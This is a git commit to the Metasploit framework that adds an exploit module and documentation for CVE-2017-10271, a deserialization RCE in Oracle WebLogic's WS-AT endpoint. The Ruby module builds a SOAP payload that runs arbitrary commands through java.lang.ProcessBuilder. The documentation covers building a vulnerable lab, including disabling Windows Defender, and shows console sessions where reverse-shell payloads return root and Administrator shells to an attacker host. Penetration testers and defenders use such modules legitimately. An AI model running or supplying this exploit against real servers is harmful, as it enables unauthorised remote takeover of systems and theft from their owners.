Land rapid7#9379, Oracle Weblogic RCE exploit and documentation

asoto-r7 · asoto-r7 · commit c390696ddf2b · 2018-01-25T21:47:18.000-06:00
diff --git a/documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md b/documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md
@@ -0,0 +1,95 @@
+# Description
+
+This module works leverages [CVE-2017-10271](https://nvd.nist.gov/vuln/detail/CVE-2017-10271) against Oracle WebLogic Server's  Web Service Atomic Transaction API a XML SOAP request to create a `java.lang.ProcessBuilder` object to provide unauthenticated arbitrary command execution.  A command line can be acquired through the use of `cmd/unix/reverse_python`.
+
+Note that the TARGET must be set to match either a Windows or Unix-based host.  If the TARGET variable is set improperly, a log entry will be generated on a vulnerable server, but the server will not crash.  For example, a Linux payload sent to a Windows server will output:
+
+```
+java.io.IOException: Cannot run program "/bin/sh": CreateProcess error=2, The system cannot find the file specified
+Continuing ...
+```
+
+# Vulnerable Application
+
+Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution.
+
+### Windows: Setting up a vulnerable application
+
+We successfully tested this exploit against a fully-patched, Windows 10 (x64) target.  Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM.
+
+1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`).
+2. Run the installer.  (See [here] for detailed instructions.)  You may be prompted to install a Java Development Kit (JDK).  [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working.
+3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it.
+4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192).  Domain names and credentials are irrelevant.  At the conclusion of the wizard, click "Start Admin Server".
+5. The `startWebLogic.cmd` should run immediately after the installer and present logging output.  Once running, the window should output a line similar to the following
+```
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to RUNNING>
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000360> <Server started in RUNNING mode>
+```
+
+### Windows: Attacking a vulnerable application
+
+Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600
+
+Microsoft Windows [Version 10.0.16299.192]
+(c) 2017 Microsoft Corporation. All rights reserved.
+
+C:\Oracle\Middleware\user_projects\domains\admindomain>whoami
+weblogic-server\Administrator
+```
+
+### Unix: Setting up a vulnerable environment
+
+1. If necessary, install Docker.io.  [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM:
+
+```
+apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
+echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list
+apt update
+apt-get install docker-engine
+service docker start
+docker run hello-world
+```
+
+2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0:
+```
+docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271
+```
+
+3. Confirm that the container is up.
+```
+docker ps
+```
+
+### Unix: Attacking a vulnerable application
+
+Attack the above Unix server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of the target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 1
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/unix/reverse_python
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of the attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 5 opened (192.168.108.1:4444 -> 192.168.108.129:51312) at 2018-01-11 11:46:49 -0600
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+# Credits
+Documentation originally written by Aaron Soto (@asoto-r7) and was edited by Kevin Kirsche (@kkirsche).
diff --git a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  # include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
+        'Description'    => %q(
+            The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
+        remote code execution vulnerability. Supported versions that are affected are
+        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
+        of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
+        HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
+        and will not be used when executing the exploit itself.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
+          'Luffin', # Proof of Concept
+          'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
+        ],
+        'References'     =>
+          [
+            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
+            ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
+            ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
+            ['CVE', '2017-10271'],
+            ['EDB', '43458']
+          ],
+        'Platform'      => %w{ win unix },
+        'Arch'          => [ ARCH_CMD ],
+        'Targets'        =>
+          [
+            [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
+            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
+          ],
+        'DisclosureDate' => "Oct 19 2017",
+        # Note that this is by index, rather than name. It's generally easiest
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
+      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
+      # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
+    ])
+  end
+
+  def cmd_base
+    if target['Platform'] == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
+  end
+
+  def cmd_opt
+    if target['Platform'] == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+
+  #
+  # This generates a XML payload that will execute the desired payload on the RHOST
+  #
+  def exploit_process_builder_payload
+    # Generate a payload which will execute on a *nix machine using /bin/sh
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <void class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>#{cmd_base}</string>
+            </void>
+            <void index="1">
+              <string>#{cmd_opt}</string>
+            </void>
+            <void index="2">
+              <string>#{payload.encoded.encode(xml: :text)}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </void>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
+  # from the target machine.
+  #
+  def check_process_builder_payload
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java version="1.8" class="java.beans.XMLDecoder">
+        <void id="url" class="java.net.URL">
+          <string>#{get_uri.encode(xml: :text)}</string>
+        </void>
+        <void idref="url">
+          <void id="stream" method = "openStream" />
+        </void>
+      </java>
+    </work:WorkContext>
+    </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
+  # the logs too much with a no response error or similar.
+  #
+  def on_request_uri(cli, request)
+    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
+    send_response(cli, random_content)
+
+    @received_request = true
+  end
+
+  #
+  # The exploit method connects to the remote service and sends a randomly generated string
+  # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
+  # the response from. This is based off of the exploit technique from
+  # exploits/windows/novell/netiq_pum_eval.rb
+  #
+  # This doesn't work as is because MSF cannot mix HttpServer and HttpClient
+  # at the time of authoring this
+  #
+  # def check
+  #   start_service
+  #
+  #   print_status('Sending the check payload...')
+  #   res = send_request_cgi({
+  #     'method'   => 'POST',
+  #     'uri'      => normalize_uri(target_uri.path),
+  #     'data'     => check_process_builder_payload,
+  #     'ctype'    => 'text/xml;charset=UTF-8'
+  #   }, datastore['TIMEOUT'])
+  #
+  #   print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
+  #
+  #   waited = 0
+  #   until @received_request
+  #     sleep 1
+  #     waited += 1
+  #     if waited > datastore['HTTP_DELAY']
+  #       stop_service
+  #       return Exploit::CheckCode::Safe
+  #     end
+  #   end
+  #
+  #   stop_service
+  #   return Exploit::CheckCode::Vulnerable
+  # end
+
+  #
+  # The exploit method connects to the remote service and sends the specified payload
+  # encapsulated within a SOAP XML body.
+  #
+  def exploit
+    send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path),
+      'data'     => exploit_process_builder_payload,
+      'ctype'    => 'text/xml;charset=UTF-8'
+    }, datastore['TIMEOUT'])
+  end
+end
